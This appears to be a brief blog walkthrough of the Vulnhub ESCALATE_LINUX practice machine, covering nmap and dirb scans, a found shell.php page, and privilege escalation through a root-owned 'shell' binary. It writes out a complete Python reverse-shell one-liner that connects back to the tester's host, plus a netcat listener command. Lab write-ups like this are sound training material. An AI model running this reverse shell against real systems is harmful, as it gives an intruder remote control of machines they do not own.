Vulnhub ESCALATE_LINUX Walkthrough

Running nmap to see information about the host:

Nmap –A –T4 –p- 192.168.1.18 –vv

Lets run dirb on the site using –X .php to find php pages

Dirb http://192.168.1.18 –X .php

A page with the name shell.php is found ummmm ran it and I got :

And then using a python script to connect while running nc –lvp 4444 on my machine

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

And I got shell …. Breaking out of it

python -c ‘import pty; pty.spawn(“/bin/bash”)’

and if you get double characters use this command

stty raw –echo ( I googled it 😀 )

going straight to home we find we have user1 – user2 – user3 – user4 – user5 – user6 – user7 – user8

as I went from one to one and listing files as I reached user 3 I found a file named shell , ran it and im root, simple as that.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s